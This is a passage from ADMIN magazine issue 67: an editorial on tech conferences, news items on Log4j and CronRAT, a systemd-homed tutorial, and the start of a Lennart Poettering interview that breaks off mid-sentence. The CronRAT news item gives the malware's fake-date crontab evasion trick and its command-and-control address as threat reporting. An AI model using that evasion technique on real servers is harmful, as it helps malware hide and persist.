FREE

DVD Tracking MITM systemd Security

ADMIN
ADMIN
Network & Security

Network & Security

ISSUE 67

systemd Security
Tricks for locking down your system
VMware Workspace ONE
A secure and user-friendly digital workplace
What’s New in
Windows Terminal
Clickable links and other
command-line innovations
Processor and Memory
Affinity Tools
Man-in-the-Middle Attacks
Track down the culprit with Wireshark

Zero Trust Security Strategy

Nitrokey DMARC
Hardware-enhanced Secure email Endpoint Security
security communication for Windows 10
MITRE Gatling
ATT&CK and D3FEND Generate load on
knowledge databases servers and services
WWW.ADMIN-MAGAZINE.COM
 Welcome to ADMIN W E LCO M E

Technology Conferences:
We Need Each Other
Technology conferences allow us to exchange ideas, discuss solutions, learn new
things, and geek out. Most of all, they give us that human connection we can’t get
in video chats or from email and text messages.

I think the primary thing that the pandemic has taught us, if nothing else, is that we miss
each other. We miss gathering. We miss discussing. We miss learning. And we miss clinking
glasses. Technology conferences gave us technonerds everything we could want in the latest
in technology: the learning opportunities, the gathering of like minds, the toasting with beer
glasses, and the geeking out over someone in a Storm Trooper costume or a modified DeLorean.
Tech conferences gave us what we need most: each other.
As a non-monetized sideline, I perform weddings. I’ve only done a few, but I’d love to do more. I customize
the wedding for each couple. I make them personal, and the focus is 100 percent on the two people getting
married. That’s why, in part, I’ve never been able to deliver the message I feel describes our need for each
other. The story is short, simple, and beautiful.
Whether you believe that an all-powerful God drew us out of the earth or that lighting struck a pool of chemicals
some half billion years ago, the first gift given to us was life itself, and the second gift was that of each other.
Since those first two one-celled organisms huddled together in the darkness, we have needed each other.
Technology conferences satisfy our need to gather. Zoom calls and virtual meetings just don’t have the same
effect on our psyches. Sure, we can see each others’ faces, we can discuss business, we can share lunches, and
we can cover a multitude of topics, but when we look around the room, we are still alone. We all know that
isolation isn’t healthy, but during a pandemic the opposite, at least physically, is true.
I need to speak directly to a person in a booth. I need to pick and choose my swag. I need to tell my favorite
joke when I have the opportunity to introduce a speaker. I need to covet the T-shirt I didn’t get. I need to ask
questions during a breakout session. I need to sit down uncomfortably at a table full of strangers at lunch time
and wait for an opening in the ongoing conversation to satisfy my need to interact with other humans. I’m
one of those people who wants to know where everyone is from, what you do, and what your hobbies are. I
don’t know why. I either find myself being terribly shy and withdrawn or so outgoing that I become the glue
of a random group. It’s weird, but I must interact.
I have worked from home for so long that my internal filter and whatever boundaries are supposed to exist have
eroded away along with some of my manners. I seem to speak almost in chat style now. No, I don’t say, “LOL,”
but my conversational style and tone are instant messaging-esque. I’m sure you understand that statement,
having worked remotely yourself.
I like working from home. I really do. I always hated going into an office. I prefer solitary time when I work so
that I can accomplish my tasks without interruption or distraction. As you all know, people in an office can be
very distracting. There’s always an off-topic discussion to focus on, a “Where’s lunch today?” question, or some
object being tossed between two or more coworkers. I like the interaction, but I also don’t want to work an
extra two or three hours a day to make up for my lack of productivity because of it.
Technology conferences are an escape from the grind. They give us a chance to connect with people who
aren’t our coworkers. They provide an outlet for the discussions we often don’t get to have in our own jobs.
We can ponder the “what ifs” and hypothetical situations together. We can also learn from each other. “Hey,
how do you deal with X?” is always a good conversation starter. Maybe it’s just me, but I’ve learned almost as
much through lunch table discussions as I have from the breakout sessions. That one-to-one interaction is far
more valuable than the cost of the conference. I always return to my cubicle or my home office energized and
Lead Image © vska, 123RF.com

ready to try new things, improve old things, or interact with my newfound friends.
We need each other. It’s in our genetic makeup. We need technology conferences. The predictions of confer-
ences becoming extinct are exaggerated. As long as there are technology jobs, there will be a need for tech
conferences. We need each other.
Ken Hess • ADMIN Senior Editor

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 3
S E RV I C E Table of Contents

ADMIN Network & Security

Features Tools Containers and Virtualization

This issue, we look at how to secure Save time and simplify your workday Virtual environments are becoming
systemd services and its associated with these useful tools for real-world faster, more secure, and easier to set
components. systems administration. up and use. Check out these tools.

10 systemd-homed 30 BitLocker and PowerShell 52 Nutanix Community Edition

The Homed service sets up a portable BitLocker provides current Windows The free Community Edition of the
home directory, and FIDO2 or PKCS#11 versions a good, closely integrated hyperconverged infrastructure is
secure the stored files. encryption solution and lets you offered alongside its commercial
manage and maintain this feature with product for those looking to take their
16 Interview: Lennart Poettering PowerShell. first steps in the environment.
We talk to the primary systemd
maintainer about the sense and purpose 34 Gatling 58 VMware Workspace ONE
of some systemd features. Generate load on servers and services We look at the features, components,
with this load-testing tool. and architecture of this secure and user-
20 Container Security friendly digital workplace.
Two systemd container management
functions – Nspawnd and Portabled – allow
many programs to run more securely
through isolation.

26 systemd-analyze
This systemd utility determines the
security of your system, letting you
track how any service can be secured 40 ThinLinc
step-by-step in a sandbox. The revival of terminal servers during
the COVID-19 crisis depended on the IT Management
administrator to enable home office
News workplaces, with the help of tools Use these practical apps to extend,
like ThinLinc, a Linux remote desktop simplify, and automate routine admin
Find out about the latest ploys and server. tasks.
toys in the world of information
technology. 43 Windows Terminal Preview 78 eSIMs
The command prompt at the terminal is eSIM technology opportunities,
8 News under active development and comes deployment, and management for the
• WhiteSource releases free Log4j with a wide range of configuration mobile workplace.
detection tool options.
• Critical RCE Zero Day vulnerability 80 Zero Trust
found in Apache library 46 Processor Affinity Tools We look into the principles of zero
• The Linux Foundation to host the Get better performance from your trust concepts and why zero trust
Cloud Hypervisor project nodes by binding processes and models must replace endpoint
• CronRAT malware targets Linux servers associating memory to specific cores. security in local networks.

4 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Table of Contents S E RV I C E

43 New features in Windows 74 Endpoint Security for

Terminal Preview Windows 10
Interesting features in the latest Build 21H1 has numerous protection
preview include state-preserving mechanisms that expand the list of
quick access to windows and new security features and achieves
configuration of settings in a GUI. an improved level of protection.

Security Nuts and Bolts

Use these powerful security tools Timely tutorials on fundamental

to protect your network and keep techniques for systems
intruders in the cold. administrators.

62 DMARC 86 MITRE ATT&CK & D3FEND

Targeted configuration and the These knowledge databases provide
combined abilities of SPF and DKIM useful techniques for securing your IT
safeguard and protect against spam infrastructure.
and phishing.
88 Optimizing X Window Displays
64 Nitrokey Two command-line tools, xandr and
Hardware authentication devices raise xinput, let you optimize your X Window
data encryption, key management, and display from the terminal.
user authentication security to the
next level. 90 Rescuing macOS Data
macOS on-board tools and third-party
applications can help prevent the loss
of files and make security and backup
your first priority.

70 MITM Analysis
Wireshark and a combination of tools
comprehensively analyze your security
architecture.

74 Win 10 Endpoint Security

We look at on-board protection 94 Performance Dojo
mechanisms to delay updates and Compressed memory solutions for small
harden the operating system. memory problems.

Service
3 Welcome
4 Table of Contents
6 On the DVD
97 Back Issues
98 Call for Papers

W W W. A D M I N - M AGA Z I N E .CO M
S E RV I C E On the DVD

Fedora 35 Server (Install)

On the DVD
The Fedora community delivers a short-lifecycle server
operating system for seasoned system administrators
with the latest technologies available in the open source
community. Fedora Server boasts:
Q Modularity – keep your stacks and software, even
when your OS upgrades to a newer version.
Q Easy administration – view and monitor system
performance and status and deploy and manage
container-based services with Cockpit.
Q Advanced features – create your enterprise domain
with advanced identity management, DNS, certificate
services, and Windows domain integration.

Resources

[1] ChangeSet:
[https://fedoraproject.org/wiki/Releases/35/ChangeSet]
DEFECTIVE DVD? [2] Distribution-wide changes: [https://docs.fedoraproject.org/
Defective discs will be replaced, email: [email protected]
en-US/fedora/f35/release-notes/sysadmin/Distribution/]
While this ADMIN magazine disc has been tested and is to the best of our
knowledge free of malicious software and defects, ADMIN magazine cannot [3] Release notes: [https://docs.fedoraproject.org/en-US/fedora/
be held responsible and is not liable for any disruption, loss, or damage to f35/release-notes/]
data and computer systems related to the use of this disc.

6 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 NEWS ADMIN News

News for Admins

Tech News
WhiteSource Releases Free Log4j Detection Tool
As the Log4j vulnerability continues to wreak havoc on the IT landscape, everyone is trying to pre-
vent disaster from striking. A number of companies and development teams have released tools to
help with the detection and remediation of the vulnerability. One such company is WhiteSource.
Their new tool, Log4j Detect (https://github.com/whitesource/log4j-detect-distribution), is an open source,
command-line utility that scans your projects to detect the following known CVEs:
• CVE-2021-45046
• CVE-2021-44228
• CVE-2021-4104
• CVE-2021-45105
Once the scan is complete, it will report back the exact path of the vulnerable files as well as the
fixed version you'll need to remediate the issue. Log4j Detect should be run within the root direc-
tory of your projects and will also search for vulnerable files with both the .jar and .gem exten-
sions. Log4j Detect supports the Gradle, Maven, and Bundler package managers.
In order for Log4j Detect to run properly, you'll need to install either Gradle (if the project is a
Gradle project) or mvn (if the project is a Maven project). The developers have also indicated both
maven and bundler projects must be built before scanning. Once you have Log4j Detect installed,
the scan can be issued with the command log4j-detect scan -d PROJECT (where PROJECT is the di-
rectory housing your project).
For more information about this tool, make sure to read through the project README
( https://github.com/whitesource/log4j-detect-distribution/blob/main/README.md).

Critical RCE Zero Day Vulnerability Found in Apache Library

Chen Zhaojun, from the Alibaba Cloud Security team, recently reported to the Apache Founda-
tion that an Apache library (Log4j)
contained a vulnerability that allowed
attackers to control log messages and
log message parameters and execute
arbitrary code loaded from LDAP
servers when message substitution is
enabled.
This vulnerability (CVE-2021-44228)
Get the latest (https://cve.mitre.org/cgi-bin/cvename.
IT and HPC news cgi?name=CVE-2021-44228) was found in
Lead Image © vlastas, 123RF.com

in your inbox Log4j2 versions 2.14.1 and earlier and

received the maximum possible CVSS score of 10.0.
Subscribe free to The Log4j library is in wide use with enterprise Java software, so it's imperative that anyone
ADMIN Update using this upgrade to Log4j v2.15.0.
and HPC Update John Hammond, a senior security researcher with Huntress, warned, “If your organization uses
bit.ly/HPC-ADMIN-Update Apache log4j, you should upgrade to log4j-2.1.50.rc2 immediately. Be sure that your Java instance

8 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 ADMIN News NEWS

is up-to-date; however, it’s worth noting that this isn’t an across-the-board solution. You may need
to wait until your vendors push security updates out for their affected products.”
Even printers and CCTV systems are at risk. A new GitHub project (https://github.com/YfryTchsGD/Log-
4jAttackSurface) has been created to map out potentially affected manufacturers and components.
This vulnerability should not be taken lightly. If you use the Log4j library, make sure you start
taking steps immediately to mitigate any risk to your company, your clients, and your data.

The Linux Foundation to Host the Cloud Hypervisor Project

Backed by several powerhouses in the tech industry, The Linux Foundation is set to release a vir-
tual machine monitor specific for modern cloud workloads. The Cloud Hypervisor virtual machine
monitor will be written in Rust, focus on security, and will be capable of monitoring CPU, memory,
device hot plug, will be able to monitor both Linux and Windows guests with a minimal foot-
print, and will be able to perform device offload with vhost-user.
The backers of this new platform include Alibaba, ARM,
Intel, and Microsoft. According to Arjan van de Ven, fellow
at Intel, “Cloud Hypervisor has grown to the point of moving
to the neutral governance of The Linux Foundation." He con-
tinues, “We created the project to provide a more secure and
updated VMM to optimize for modern cloud workloads. With
fewer device models and a modern, more secure language,
Cloud Hypervisor offers security and performance-optimized
for today’s cloud needs.”
Of the new project, Gerry Liu, senior staff engineer at Alibaba,
said, "Cloud Hypervisor is a great innovation project and evolves
rapidly. Moving it to Linux Foundation will help to build a stron-
, 123RF.com
ger community and speed up the adoption." © roywylam

Find out more from the official Linux Foundation announcement (https://www.linuxfoundation.org/
press-release/linux-foundation-to-host-the-cloud-hypervisor-project-creating-a-performant-lightweight-virtual-machine-
monitor-for-modern-cloud-workloads/).

CronRAT Malware Targets Linux Servers

Security researchers at Sansec (https://sansec.io/research/cronrat) have found a new stealth attack that
targets Linux servers and uses a nonexistent calendar day to stay off the radar. This Remote Access
Trojan (RAT) masks the actions of the attack by using the date February 31 and targets Linux-based
web stores to trigger online payment skimmer threats.
The new CronRAT attack can execute fileless malware, launch malware in separate subsystems,
control servers disguised as Dropbear SSH services, hide payloads in legit-
imate cron tasks, and run anti-tampering commands. CronRAT bypasses
browser-based security scans and has already been discovered in live on-
line stores. The threat was injected into servers via a Magecart (payment
skimming) attack.
This attack is made possible because cron only checks for a date
format and not that the date of the task is legitimate. The crontab date
specification for CronRAT is 52 23 31 2 3, which would generate a run-
time error upon execution. However, that runtime will never happen,
because the date doesn't exist.
Once CronRAT is executed, it contacts a Command and Control (C2)
server at IP address 47.115.46.167:443 using a fake banner for the
Dropbear SSH service. The payloads of the commands are obfuscated
with multiple layers of compression and Base64 encoding. © ton Snoei, 123R
F.com
CronRAT is considered a serious threat to Linux e-commerce servers
and has managed to bypass most detection algorithms. Sansec had to rewrite its algorithm to
catch this dangerous threat.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 9
 F E AT U R E S systemd-homed

Portable home directory

with state-of-the-art security

Home,
Sweet Home
The systemd Homed service makes it easy to move your home directory, and FIDO2 or PKCS#11 can secure the
stored files. By Martin Loschwitz

Your home directory (~) stores per- their home directories from machine directory with a variety of systems.
sonal data and configuration files A to machine B and on to machine Sometimes shared storage such as
for the programs you use (e.g., the C without getting into any trouble NFS or synchronization solutions such
Google Chrome or Firefox profile and (Figure 1). as Rsync came into play. However,
the GTK configuration for the look The whole systemd-homed setup is Rsync requires a functioning network
and feel you prefer for the installed highly secure and efficient. Encryption connection between systems. A
desktop). Moreover, your home direc- with multifactor authentication is part company laptop that has to be
tory also contains Thunderbird mail, of the overall package, as is dynamic connected to the VPN to get an
your music collections, and your user account creation. Although Internet connection does not meet this
photos. Like your own home, the per- Homed does not support encryption condition, and you are inevitably left
sonal folder on a Linux system is typi- and login with the TPM module, out in the cold. On the other hand,
cally a place you want to keep safe. PKCS#11 and FIDO2 can be used. you could use Samba to resolve the
If you use more than one Linux com- In this article, I introduce Homed and issue, viewing Linux as something
puter, you will not find your personal look into its technical details. Before similar to a domain client in the
files on all of these devices, and fix- that, however, it will not hurt to look Windows universe. None of these
Lead Image © SOMYOT TECHAPUWAPAT , 123RF.com

ing this issue is by no means trivial. at the specific problems that Homed approaches really cornered the market.
The question of what users can do to solves – all the more so because it The idea of the portable home
share their home directory efficiently will contribute in a fundamental way directory assumes a few things that
with a variety of systems is not new. to understanding how Homed works. are not necessarily commonplace on
Systemd boss Lennart Poettering Linux or POSIX-like operating systems
finally came up with a solution Attempted Thus Far in general. First is the problem of
– Homed – that works on recent user management. If you are using
systems, relying on systemd in the For decades, the market has tried an account named Martin on your
background and making it possible solutions from a wide variety of system, you will want to use this
for users to take an external disk with approaches that share your home name elsewhere, too, when you

10 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 systemd-homed F E AT U R E S

use your mobile home directory. old, forgotten accounts have been on the disk would fail permanently
Of course, you can’t expect every used in attack scenarios. because of missing permissions.
Linux system in the world to have a
preconfigured user account with a User IDs Mandatory Encryption
suitable name that is just waiting for
someone to plug in an SSD with the Another factor plays a major role in Another must-have that, surprisingly,
appropriate home directory. Instead, the dynamic use of home directories: many users still do not have on their
you need the user account to be user IDs, although they are closely radar to this day is disk encryption.
created explicitly. related to usernames. On Linux sys- With many PCs and certainly with
To begin, a user account must be tems, the username is effectively the vast majority of devices used
created on a system. When the only the human-readable variant professionally, the value of the data
system then detects that a mobile of the user ID, which is assigned to stored on the machine clearly exceeds
home directory exists for the the respective account at the system that of the hardware. Even a top-of-the-
respective user, it integrates it. Even level. If you want the system to cre- range Thinkpad “only” costs a good
here, systemd faces a challenge ate a user dynamically after a disk $4,000 (about EUR3,600). However,
because before Homed it did not has been plugged into a USB port, the if the blueprint for an innovative
play a role in the system’s user process implicitly creates a user ID. machine or the company’s current tax
management. Now, however, it has to For a user ID (and, in parallel, a return is stored on the device and it
be able to create users and groups. group ID), however, the Linux sys- falls into the wrong hands, somebody
The whole thing must also work tem defines various parameters for is in trouble. The damage caused by
the other way around. Imagine, say, each file (e.g., who owns it and who industrial espionage and damage to the
publicly accessible systems that are has access to it). This information company’s reputation can exceed the
intended for use by several people is stored on the filesystem, which value of the hardware many times over.
with portable home directories. It means that it is also stored on the Manufacturers have long since
quickly becomes clear that the system USB stick or SSD that contains the recognized this vulnerability. Microsoft,
also must be able to delete the user portable home directory. When the for example, offers BitLocker to encrypt
accounts it creates as soon as the user user plugs in an SSD, the UID on all PC storage devices automatically
logs off and removes the disk with the system needs to match the con- in the background. Apple does the
the storage. User accounts that cannot tents on the USB stick. If this is not same with FileVault, and the popular
be disabled are not just useless, they the case, a corrective mechanism is Linux distributions now also rely on
are dangerous. IT history shows that needed; otherwise, access to the files comprehensive encryption of storage
devices, especially on desktops. An
NVMe or SSD drive, of course, must
also be encrypted if it contains most of
the most information in your life.
How can secure encryption of mobile
devices be achieved in a meaningful
way when the computer is missing? A
64-digit password would provide some
security, but it would fail to provide
effective protection if no one could
remember it. Encryption by means
of a certificate or multifactor access
control (e.g., FIDO2 in addition to the
password) is more useful, preventing
data leaks even if the stick and the
password fall into the hands of a third
party, as long as they don’t have the
second authentication factor. However,
if this kind of technical overhead is
required to encrypt the device, then the
token you rely on to do so can also be
used to log the user onto the system.
Clearly, mobile home directories are
Figure 1: M.2 SSDs (for high-performance storage in power-constrained devices) are so a great idea, and they seem simple
small and light that even large volumes of data can now be moved back and forth with ease, to implement in theory, but if you
which allows home directories that are not tied to a single system. take an in-depth look at the technical

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 11
 F E AT U R E S systemd-homed

challenges, disillusionment quickly mechanisms (e.g., /etc/passwd Truly Mobile Home

sets in. Homed at least claims to and /etc/group). Instead, it taps
Directories
address the challenges described into the dynamic authentication
above. How does it do this in detail, mechanisms with a separate Anyone who has ever dealt with
how does the user benefit from it, pluggable authentication module encrypted volumes on Linux knows
and what are the limits of the system? (PAM), complementing the existing that working with LUKS and the like
login system in the process. For the is not necessarily a pleasant experi-
Getting Started with Homed administrator, this means if they want ence. Homed takes a large part of the
to use Homed on several systems to work off your hands by configuring
The various desktop distributions are manage a central home directory, LUKS in the background in line with
sufficiently up-to-date as to include they can influence the user IDs with your specifications – but without
Homed. The situation might not be as homectl parameters. In this way, you forcing them into direct contact with
easy for more exotic systems such as can ensure that the IDs of the users the LUKS tools themselves. Again,
Raspberry Pi OS. Often older systems in question match on all participating it is just a question of the right pa-
such as Debian GNU/Linux “Buster” systems, which is expressly rameters for homectl to avoid loading
serve as a foundation, and the Homed recommended; otherwise, Homed will the user directory created by Homed
version included is outdated and less use a crude hack to keep things tidy. locally and putting it on a USB stick
than satisfactory. Of course, Debian After logging in, Homed simply runs instead.
GNU/Linux 11, alias “Bullseye,” has chown over the entire home directory From the homectl command used be-
been released in the meantime, so and changes its contents to the user fore, the following command uses a
there is hope of updates for these ID and group ID that the user has on USB stick to store the home directory:
systems in the near future. the system.
A sufficiently recent systemd Assuming the user ID needs to be $ homectl create martin U
automatically includes Homed; the 2000 on all systems, the following --real-name="Martin Loschwitz" U
homectl utility [1], which creates command creates the user and adds --uid=2000 U
users, and the userdbctl query tool some background information: --image-path=/dev/disk/by-id/U
should be in place on the system. usb-SanDisk_Ultra_U
Clearly, systemd does not find the $ homectl create martin U 4C530000060908106243-0:0
username automatically on the basis --real-name="Martin Loschwitz" U
of plugged-in devices. Theoretically, --uid=2000 You need to modify the part after
it would be quite conceivable for --image-path if the USB stick is
Homed to create a suitable user In this case, a user named martin is referenced by its unique device ID,
account as soon as a device is plugged a member of a group with the same as in the example. Homed again
in, which would mean total flexibility name. Unlike before, however, the UID takes care of all the administrative
for the home directory because it is not randomly selected by Homed work by first deleting all the
would then even be available on but defined manually. Still unsolved existing files on the USB stick.
public terminals that support Homed. is the problem with the user’s home Then it creates a partition table and
However, the developers have directory. Homed has created this proceeds to create a LUKS-encrypted
deliberately not taken this approach. directory and encrypted it with Linux device. The USB stick is now
Instead, Homed waits for the user to Unified Key Setup (LUKS), but this by genuinely portable. If the owner of
create the account, no means makes it mobile. the directory logs out of the system
Unless the user specifies otherwise, so that there is no longer a current
homectl create <user> Homed uses LUKS to create an session, Homed automatically logs
encrypted home directory and a off the LUKS device. The user then
for which you need the rights of the loop device in /home/<user>.homedir/ simply unplugs the USB stick on
root system administrator. Homed, and mounts it in /home/<user>/ after which it resides and takes it to
therefore, is primarily designed for successfully logging in to the system another device to log in with an
use cases in which the user is only – and only then. This process is account managed by Homed, which
sharing their personal directory basically programmatic with Homed: recognizes the home directory from
between several systems over which A user’s personal directory is only the USB stick and automatically
they have full control. accessible while the user is logged enables it on the new system.
in. As soon as the user’s last login
Handling User IDs session expires, systemd automatically PKCS and Tokens
unmounts the directory containing
Homed implements the process of the user’s personal data. A new login Users created as shown by the ex-
creating and deleting user accounts, is mandatory to put it back into amples in this article still do not have
bypassing the existing system operation. passwords, and no alternative login

12 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 systemd-homed F E AT U R E S

methods are specified, so they can’t multitude of standards and their op- (i.e., the URI) to the device on the sys-
log in at all. Fortunately, systemd of- tions that already exist on the market tem. Homectl at least offers a way out.
fers far more options than mere pass- for this task. The command
words. The team led by Poettering has The two best known representatives of
much to offer, and the biggest hurdle crypto keys are probably PKCS#11 and homectl --pkcs11-token-uri=list
might be to combine the respective FIDO2. PKCS#11 is a slightly different
authentication device with the appro- standard; older YubiKeys (Figure 2) displays a list of all available devices.
priate option when creating the user use it, but it will primarily be familiar In order for the command to find the
in Homed. For once, however, this is from classic smartcards (Figure 3). If device, it must be mounted at the
not down to systemd itself but to the a smartcard or an older YubiKey is to time of the call.
be used to unlock the account, the big-
gest challenge is to identify the path

Figure 4: More modern FIDO2 tokens can

also be connected to Homed. If you specify
Figure 3: PKCS#11-based authentication the right parameter when creating the user,
Figure 2: Older YubiKeys use older versions usually relies on physical smartcards. the FIDO2 key then unlocks the account,
of authentication tokens. © YubiKey © Cardomatic including the home directory. © Feitian
 F E AT U R E S systemd-homed

If you use an authenticator ac- that if you lose the device for gen- that the principle is subject to techni-
cording to the FIDO2 standard erating tokens or the original key, cal limitations that even Homed can-
instead (Figure 4), you need the you can’t access the data, no matter not define away.
--fido2-device= parameter, which what you try. Good practice dictates The most relevant limitation here
also supports the list keyword, generating an emergency key with is by no means on the Homed level
which brings to light a list of avail- the device and keeping it in a safe but relates to the applications you
able devices along with their URIs place. It is essential to protect the use with your portable directory.
on the system. Additionally, the auto key against access by unauthorized The home directory will fill up with
keyword works if only one device persons because anyone who has garbage relatively quickly if you
fits the bill. The entire call is then: the key can decrypt the encrypted use it on different systems with
volume; therefore, you should keep different distributions because the
$ homectl create martin U the key as a hard copy on paper in a configuration files will then contain
--real-name="Martin Loschwitz" U safe place (e.g., a safe). competing entries. For example, if
--uid=2000 U By appending the parameter --re- you use Ubuntu 18.04 on one system
--image-path=/dev/disk/by-id/U covery-key=yes to the command for and Ubuntu 21.04 on the other, you
usb-SanDisk_Ultra_4C5300000U creating the user, you can make sure will find different KDE versions on
60908106243-0:0 U that Homed automatically creates the two distributions. If you plug the
--fido2-device=auto a suitable key. The key is then dis- home directory of the KDE version
played onscreen and can be copied from Ubuntu 18.04 into the computer
The user created in this way has a from there. with Ubuntu 21.04, KDE will find the
personal directory on a USB stick and old configuration files and convert
logs on to the system with an authen- Retroactive User Changes them accordingly. However, the return
tication device. route is blocked: KDE on Ubuntu
Regularly, not all the parameters you 18.04 cannot understand the new
PKCS#11 Special Case need are configured when a user is configuration and, in the worst case,
first created in Homed. For example, will create a completely new one.
If you opt for PKCS as your login if you don’t have a YubiKey or smart- The problems become even more ob-
method, you definitely need to re- card when you create a user, you vious when you imagine different sys-
member that the YubiKey has to be won’t be able to use them. The good tems or distributions. A home direc-
set up before the Homed configura- news is that Homed lets you add de- tory from openSUSE Leap is unlikely
tion. The ykman commands tails such as decryption devices and to harmonize with Raspbian as used
modify the details of an account after on a Raspberry Pi.
ykman piv reset the event with the homectl update If you want to avoid compatibility
ykman piv generate-key U command. problems, you need to take manual
-m RSA4096:*9d pubkey.pm If you want to enable PKCS#11-based steps to prevent some files ending up
ykman piv generate-certificate U or FIDO2-based authentication for an in your home directory, which has the
--subject "Homed" 9d pubkey.pem account, you can use either of: unpleasant side effect that you then
have to configure your own desktop
delete old keys from the device, cre- homectl update martin U again on every system you use. Al-
ate a new key, generate the certificate --pkcs11-token-uri=auto ternatively, you can take care to use
required for the key, and load it onto homectl update martin U the shared home directory only on
the YubiKey. Then, --fido2-device=auto systems that are mutually compatible
in the broadest sense. Q
rm pubkey.pem Because the commands and
parameters are the same as when
removes the key file from the setting up the user, you avoid the Info
filesystem. After that, the login can be need to learn new parameters. [1] homectl: [https://www.freedesktop.org/
configured as described earlier. software/systemd/man/homectl.html]
Limits
Playing It Safe The Author
Homed takes the promise of the mo- Freelance journalist Martin
The homectl command also supports bile home directory quite seriously Gerhard Loschwitz focuses
the --recovery-key parameter. If you and implements it sensibly. Despite primarily on topics such
have ever dealt extensively with all the euphoria about the technology, as OpenStack, Kubernetes,
cryptography, you will be aware users and admins should not forget and Ceph.

14 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 F E AT U R E S Interview: Lennart Poettering

The achievements of and plans for systemd

Extending
Integration
We talked to systemd maintainer Lennart Poettering about the sense
and purpose of some systemd features. By Jens-Christoph Brendel
CC-BY-SA-3.0 [1]

Linux Magazine: If you take stock of users are the original mechanism used management system where the user
the last three or four years, what have to implement privilege separation on password is the encryption key. I
been the most important innovations Unix and Linux. No matter which could continue this list for a long,
in systemd during this time? subsystem you look at, access control long time – after all, there are so
based on users is always implemented many useful new features in systemd.
Lennart Poettering: That would be, on Linux. Other concepts – such as If you want to know more, take a
firstly, all the security features we SELinux labels, Access Control Lists look at the NEWS file in the systemd
have added and made visible with (ACLs), other Mandatory Access sources, which is where we write
the systemd-analyze security tool. Controls (MACs), and so on – are not everything down in more detail, while
Regular system services can now be universally available and are nowhere hopefully keeping things reasonably
locked into effective sandboxes with near as popular or as universally well understandable.
relative ease, but can still be integral understood. Maybe a word about one last set of
parts of the host operating system. Classically, however, such system innovations: We recently added sup-
I believe this has advanced Linux users are expensive, with only 1,000 port for FIDO2, PKCS#11, and TPM2
system security quite a bit. of them (or sometimes only 100 or security chips to systemd for disk
Another important innovation 500, depending on the distribution), encryption or user authentication. For
might be systemd-tmpfiles and and they are allocated individually the first time, this makes it possible to
systemd-—sysusers. Strictly speak- during package installation. So set up truly secure systems on Linux
ing, they are more than four or five traditionally they can only be used with practically on-board tools, with-
years old, but it is only in the last roughly to secure large services but out getting lost in massive manual
three or four years that they have not to protect individual instances scripting sessions or reducing security
finally seen more widespread use or transactions. There are simply too to passwords.
in the popular distributions. We are few of them for that. The dynamic
looking to move to a declarative de- user concept solves the dilemma: It LM: What else is on the wish list for
scription of the system and its com- makes cheap what was previously the near future?
ponents, leaving behind imperative expensive. Dynamic users can
scriptlets in packages and the like. be allocated for a short time and LP: Many people working on systemd
This improves robustness, security, returned after use. This practically have different interests. Personally, I
and reproducibility. breathes new life into an old Unix have a great interest in simply mak-
The dynamic user strategy makes strategy and is a mechanism that ing Linux even more secure, and, by
it possible to allocate system users can definitely contribute a great deal that, I mean the classic, generic Linux
dynamically when starting system ser- to further improving the security of distribution.
vices that are automatically released Linux systems. It hurts a bit that other operating
again when the service terminates. Last but not least is systemd-homed, systems like macOS or Windows cur-
This takes into account that system a really secure home directory rently protect user credentials better

16 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Interview: Lennart Poettering F E AT U R E S

than we commonly do on Linux ones. I’d like to see us catch up there however, we have always opted for
with our home directories. Even the with generic Linux distributions so correctness and manageability.
non-traditional Linux systems like that the data on our laptops remains By way of an example, we work a
Chrome OS or Android are generally at least as secure in every way as, lot with small files in drop-in di-
far better secured than classic Linux say, on a Chrome OS system. It’s rectories, such as unit files located
distributions because they detect and downright embarrassing that this in /usr/lib/system/system/*. These
prevent offline modifications of the is not yet the case. We need to do support modularity, so package
system, for example. Applications better, especially in this age of Pega- managers can easily and elegantly
also run on them in relatively secure sus and similar systematic security add and remove components from
sandboxes by default. None of this threats. I think systemd can and the operating system. In terms of
really exists on classic Linux so far. should play a certain role in making boot speed, this is more of a disad-
There are projects in this vein, but generic distributions more secure: vantage: If we packed the service
only a few of them have reached the more TPM2, meaningful secure boot, descriptions into a single large file
“mainstream” of Linux distributions more sandboxing, more encryption, instead of many small ones, they
so far. more integrity – and all without re- could almost certainly be read many
This is exactly where I hope to ally demanding more knowledge times faster, but then nothing would
improve the situation. The basic from the admin. be modular. However, modularity
infrastructure is certainly provided Another related topic in this context is more important to us than plain
by most distributions, but there is is Rust: Sooner or later we should speed at boot time, so we went for
a lack of integration, of connect- move away from C. It’s just too hard drop-in files anyway.
ing the various subsystems to make to use the language correctly, and I don’t think it’s a good idea to bal-
them useful, which is exactly what even the best developers make mis- ance supposed speed advantages
the support for TPM2/PKCS#11/ takes all the time. Rust is probably against security gains from more
FIDO2, mentioned earlier, is aimed the first language that has a chance init system alternatives – they have
at. The subsystems for the respec- to replace C on a broad front. For nothing to do with each other.
tive technologies have existed for a systemd, that means we have to fig- Sure, it would be good if there were
long time, but few specialists actu- ure out how to make the transition convincing Linux init system alter-
ally use them together because the as developers. We don’t want to be natives to systemd – competition
required integration with the rest pioneers but instead wait for other stimulates business, monoculture is
of the operating system just never projects to solve the most pressing not ideal – but I still believe that the
happened or was incomplete. I see problems for us before we make the very best thing for more computer
systemd as the project that can do leap ourselves. After all, for us, a security is better technical secu-
precisely that in a good way – deter- programming language is just a tool, rity strategies: more sandboxing,
mining where the journey should go not a purpose in itself. lockdown, integrity checks, and so
and then integrating the subsystems on. You certainly don’t do general
needed to get there. For example, LM: One of the systemd goals was to computer security any favors by
tying disk encryption to TPM2/ accelerate and standardize boot se- continuing to maintain multiple init
PKCS#11/FIDO2 fits right into this quences. This goal can be considered systems that offer no security strat-
